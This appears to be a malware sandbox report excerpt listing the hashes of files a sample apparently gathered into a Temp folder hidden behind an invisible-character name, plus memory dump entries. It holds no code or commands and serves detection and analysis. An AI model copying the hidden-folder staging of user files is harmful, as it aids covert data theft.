SHA256 d73f205c75d8b65034ca0e49516a520dd839da2c0368202b33dadb54d2693fce
SHA512 8e3459767f9972e55b463d39f4add0f18697e0134fafda40ae22aacae5d16ffdc14a4fcdb69e6f076bbc121b5e2155cdce0bf43130c67d0546e7044c66e6b14d

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Desktop\WatchStop.docx

MD5 f73267488a81f01511c81a233139ccbc
SHA1 eddd019e5b2c796ae7f48472d5e6a505336a1cfa
SHA256 4fa687b679dfb487c2ca48480fcd9755f378177e2081c5d5fc2793f75ffa0e02
SHA512 62c6eb34f11d1bd3a33a295ab49d0b37f1d154693cb463ed8dcb03bfe7ed869e3b71f932c7441fc5f37d0ca7524b384bd73fb61c7fd132acf2e37373b0df1d37

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Desktop\WatchFind.doc

MD5 a7babd4f107850015947dea593ca85cd
SHA1 f263814e004a82a9709b0d387c5c660d5772f3fa
SHA256 f7fb8007da9820e79b059765b9db7a5cbf6a908de25ff7d0503711fca0ad13ef
SHA512 afd4cfce872934beff2473981167a5a8d788c08d612b6315ee45c8c90c264d1443e4da0c2e97aefa39392365eae984b3c2929feaff15cc3a47da75372878b4fc

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Desktop\UnprotectNew.xlsx

MD5 25b1aba004a81909385ad901db21420f
SHA1 bfeea10e69c0b99bca072a9995b98a3f45b155d9
SHA256 fc73e7df3d777c617cb5820f2793b0bfd36d9d3d020a62a692526ec3207e01b1
SHA512 299ebed6b8fb486a6fcb9d0c654a862d4f0880a47c22bccd36dfb80ddd7464b987f5d5769389f6e0b2cb5717bce4a79af8e3e5b130ca0ea1820e0273ddc11847

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Desktop\UndoApprove.jpeg

MD5 d4a5b1f95db44d23706e0f00108124a5
SHA1 41f5a34515aa5ce292300ab8096d8fbf430a4ecd
SHA256 ab422f49e5ea85edda7dc90d18c04bbc32db659aa67cbc87eef4a170b1a6a79c
SHA512 4d488d3078c25c149dfad955fd3c218334068f0ad5049e78e596bb9819a52c6b9b045394cd4a702bac65744872819f4959a03ff5832b76311cadc3197952486e

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Documents\EnterOut.xlsx

MD5 11d3d5f9c1254f0f88b8a7f9d3934862
SHA1 db0edf3f7ec5a1cd98e7c8189627254168d45349
SHA256 31605db1e330ac1d47f03d4dc4f88d10a9dcd5ab99ad9bcf4e8b05c5046c525f
SHA512 cdfeaf10e1949fed0d5101d82a5473b7108985a0edfa2ffc99c9483ca360e747caeb189695eb6c2239ddd7e8d286dc4378fbf49a0093a3fff8b857f9fa28ae37

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Documents\RequestApprove.doc

MD5 69d424971684d441e0aefe4d53630a09
SHA1 5f0a2480b84b9b3d5ca92d69b33dd693d5a66a41
SHA256 0fac1fcdf1d79c95850823d465056c14d17b4290b762239140594f2b487eeb13
SHA512 60588ae31e9fa54296fbe1b6f15f4a68146b182655b3f601b3bc23f6645ab3633bd300889fb97c1dd80b41671027cc04365558c9d3eadd1fc4586a95cd4518d0

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Documents\PingResize.docx

MD5 eb2d8811722e9b426b7ee9caba121fbe
SHA1 688ef18cfb6fb15ea85e1968d696873423ba4860
SHA256 4201942c34e2094e4ef0f9dc4fc4b0d96b0e44d109494e2876c6523a4f79d606
SHA512 3448ff4175b9abd7e9d224bcf47557658d6f68094fc2d22bd6ac73b09e88f47c33b4324c0b35252f5c41d568d6473d4ca5f1d66fd24274db090852c7c9001882

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Documents\HideSubmit.doc

MD5 acddf7c223d84bf40199608fec3bc7ff
SHA1 514dcae3a17d453ae0df4d1f79d1c40582ab1842
SHA256 7872d604e773b356fa06722e9348e6df8b807e1ee90135d15e55eb12b0fe54fe
SHA512 0cee61c8948d5a625973dc5e6e37a5b3481d2e456e5aceee67bf8ca4fb3a3734c29f3c529bd50650508dfae627c965f9e2cbb72209ad3d72f0c55c0e9601c76e

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Documents\RestoreConvertTo.csv

MD5 e376b5cff1f1c3bb7493463ca33751a8
SHA1 921494f0e94d1720051b12bd64a0a29909d2a5a8
SHA256 a7d43a40312c2b6a3e264b0d1b801f957eef27267dbac085105ecd47c720790e
SHA512 74fba65563c5a61f42523b30e6304ce363e3c92ed3c2e4356258391f3a49d9e67d13b932a6b40730600ea367faed38f103eb7c863405c034131f9ae5f8cfb25f

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Documents\StepConvertFrom.txt

MD5 fc5b67cc089ce8b197be91901031c8be
SHA1 07a80cc118ba0c5e535148b15fbbebf8a8cb2adc
SHA256 62d7f2248b1f7acd22e54a0fa54dc96ad297f5def43a291fa86378afa29a3a94
SHA512 d34bc65e45066d437141db09df774df4a34a58f8ad3b6d2a15f7c34b48a0098fb31ae25898c37d927a77817c965129e72f982305d8f35a35a7cd08cfde88fbbb

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Documents\UndoMove.xlsx

MD5 5f62f52ffcefff59dc26de22ea5f2556
SHA1 2a542009c51ab24cac5f77f55f2779b8d5bddf7b
SHA256 4d783085d40501e44d83821a75ee07b8e056d23795ccae4fdb415e700cf83e7f
SHA512 5a4fdf55ebba9caaa055fa1f8a5515736f505d356a8ea4507e19848b18a6ffc4e10ee812a03dc39c642c44569e18485c5b97817dc508509e177b4e5c765c4093

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Downloads\EditBackup.mhtml

MD5 37819c57bfbfae91512bf3e2d617f2bc
SHA1 ef8865f52f9558577cebba0078fe67d43e25eca0
SHA256 c95386ad185f950bef718154dfa830a2d529438d0baaf885f8ce13e8029ad846
SHA512 4b1bb8bb811ebc1f88f5bcde7fb0fae7e78fcb4251a1c96326f99b188d97eaade105e0d549e6242d31212981e4781f8d074c8b269edc05aebe5ebe51bbd1ebbc

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Downloads\CompressNew.jpeg

MD5 c6311d47c8b9c1d2007fc79a2890dd50
SHA1 54cfd151c4ea996aaf5294be37b8e8dc9b975fa9
SHA256 3aea45617a498c9db559b5466d2faae20ec9bec32d9dbd990201f6f1aa3bbfc2
SHA512 0cad17efddadf3e3018e5c8aee769e1e1fa0c88177668306ab3e87ee26a809885831e26f2ec73cbb3623a3a87ea9f3944ddf16bd7af82b3a0ca3257fdacdaffd

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Downloads\MeasureEnter.pdf

MD5 426d47bace249de2d47547d0a88e90b2
SHA1 631cc3edad521baea601756b7e523d91488ee64e
SHA256 8f6c70a6a20d4faaa995a0e66032a4e6d5f7dd1090fd453586960d5c74f8abe9
SHA512 f7ea6d3fa6bf17cf8b1be92e369cd43704bfe49d52b381a94a1077f2cd0c7bef73555162722c50549b2ebf8f71ab9a65f5842615cf91b1e01253e43852ade37f

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Downloads\LimitAssert.mp3

MD5 8a3e8c21bbf15688062ea3b22a68e277
SHA1 7209f274731433861877d182c9e8f292b588bee9
SHA256 f2296cf41402fc31cec072c212d2203d0835e4dba28c914cfeaeaaa3c4732b47
SHA512 923e6c8cac3913bb238c0a412c4432b1b17495d764ad783c317fca24753153051feb6ba31ccf25a3034a84450bfa408ef238a4fcbdf3b1c8425a9c2627777830

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Music\BackupEnter.mp3

MD5 b6573e891c4bd03bbc102196f5e83a93
SHA1 388a2efe2b1b75306e153e2b6bcaa9fdd4c32d89
SHA256 b9bd9febd6ffab051e22c38ce46b6a16cd01c7568bb0a27a0be623c76af85bf6
SHA512 301a41166e2f3fa304afd081b8578a2dbb1af497f6bfaf51ed3058d20f58da5670dbd26c18894005e0bb3fd5286fc4a6c2d1b04f93f78b422420688cb173c4f9

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Downloads\ResumeSet.txt

MD5 425e2ea5d1a6777f0956c65249a0e0ef
SHA1 6fae09f2a6d1664c5afc4f9029e82a1ef0e720b5
SHA256 a042a6ced514da967c26744d88f781aafab4f261e0d68ea7279daf300b053d84
SHA512 3c30c30146e3a050c9cb5605c78995aa3fa4f7339954e57533ac234ce56b9acaade0391ecdafd6b65ad9f45e1d738783c6d36e84e22c95adc480d963f5deffdb

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Music\UnblockEnter.xls

MD5 ba7367179067969fa5ca3f6f4d308161
SHA1 94c0085540f843fd55a315b9f0c560ce02db1843
SHA256 a03196c51e622a7a50d3cd9cd8db44df83def73fd6d171ce4d8c7749187e44f8
SHA512 e60b87e9c83c4cf47eafc0edf183f0eb6c8dcdfefa12cf94cdddefc41b71644aab47a2bfd12cdd9324cd905930954c9832b86c91594a80786db4b3cb6816fea5

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Pictures\BackupEnter.tiff

MD5 33b4cb888e6e7202fe7a7da2599930d1
SHA1 442ed9351b6fe766c0742c72d95b1473b29bc59c
SHA256 852159986cfd56ad7819a6d219c695c2039bc1b770d8babf23d8aae5807dd1cf
SHA512 718f811aae916cd74787da8e5c3c27fb418011fc7b00ba5622f4eefe1e821763fe24e6e6793d8c8ff299a8803d6a8e5038bcbd23be0b4242435f568dd490410f

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Pictures\PopDisconnect.jpg

MD5 997f2e2ef1bec152967b952e3d735341
SHA1 5ff9fc5e673c2cf60404e9187e829a525bc4e2f4
SHA256 459b3983c490a7081ff8d6b6bc5c74200694c78472ce3e321e123b36325130f2
SHA512 f44790c3ddbeb920ba01b0adf22feef42ed47b821554828f87ff45ac6182f684a23548e4d65a3eca71bdf32d3194dc925000556179b54b3a6e6426293c60c817

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Pictures\PopApprove.png

MD5 0aa21d16271e4f18cff8d4d8467e6fc2
SHA1 eefce4e14ecfcb76cea3c3ded5534edcca87551c
SHA256 77a3bb86b48decbc54936fa692756b186c91e58a5747a540b447c9e36197d1c1
SHA512 aab45cde59497d00c19a492f285db7e4a9d5b02aa646a3a57c97d25c1767f9aa60fba9efa90ff3a693177321ea3e709c7a9462bdf8eb89511c8128337c3703f0

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Pictures\My Wallpaper.jpg

MD5 a51464e41d75b2aa2b00ca31ea2ce7eb
SHA1 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d
SHA256 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f
SHA512 b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Pictures\DismountPush.jpg

MD5 dc2edc286fec8a26cd949e159d5e7b73
SHA1 63634f5b3e0fa8e5252628c38adf21f8a6c5fc58
SHA256 b3c4e2ceb2a3b6262c2200134f87408b7656881c62efd606c337d4441455231f
SHA512 42c63ed9b3bf1685506a79df86efcac84f450acc5afb7ffc2e0b4970fe9af4c14aa096623ad6bc38b526c33369898738bb31f853f2ac45f02ebfea86cb92aa08

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Pictures\UpdateInstall.jpg

MD5 e838c765229925ca58d94b64cbed72a2
SHA1 c4624aef17dff6e2ef56a1297be159c0a2d38b49
SHA256 ee22fbadf7f81439fd949ea255b9b1a7db85b3042b566d7c929baa40114dded8
SHA512 6a444415a2e9693cdcab6f14db57a8ae72b059bbf3f72a5fb40da03c290b8da42351eae04ef9573809789f8ac34d0607c053bafbc8b473d30634f2d271f130de

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Pictures\WriteRedo.jpg

MD5 854dae9190175ec69c5dd1338d4ad855
SHA1 a5e1a82a1860f72da9ec59a0a662c3bc30fc230a
SHA256 c4b602f27affde5f024c94255fbed61baadc47fba10299436cc44a8a2e1409fb
SHA512 d18bd7b8bcb0154bf7f271ef36bf90e693a11ff562fe5e80f5282f1339bd23350f210c111af3c199b780d007b126761403c8192a37ac10bd3de8361f40b26acd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6317adf4fbc43ea2fd68861fafd57155
SHA1 6b87c718893c83c6eed2767e8d9cbc6443e31913
SHA256 c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af
SHA512 17229aae8622e4bfc3caaac55684f7d4ccd3162af5919c851b1d8ac4060b6bb7b75044ecee116523d05acb55197dcb60780958f629450edef386f1e6f65f49f0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d04a2991e3807ca4a4073c023b2d20b3
SHA1 86aeb69fd3f1c1515feb18ed345191124735775f
SHA256 33cf5b77be962c1121404da98638346eaa2286b64e45ae71e3cb5e95671b000d
SHA512 90be20a64f603d7124a84e807d1dc5d6e36bc67caf6b9b282b2c918d1beb5b9f16abb4788dcc5a2df06ad1a6606c8929962962c3db51586cd00c976b7f79b8c5

memory/824-394-0x0000000061CC0000-0x0000000061D69000-memory.dmp

memory/824-435-0x0000000061CC0000-0x0000000061D69000-memory.dmp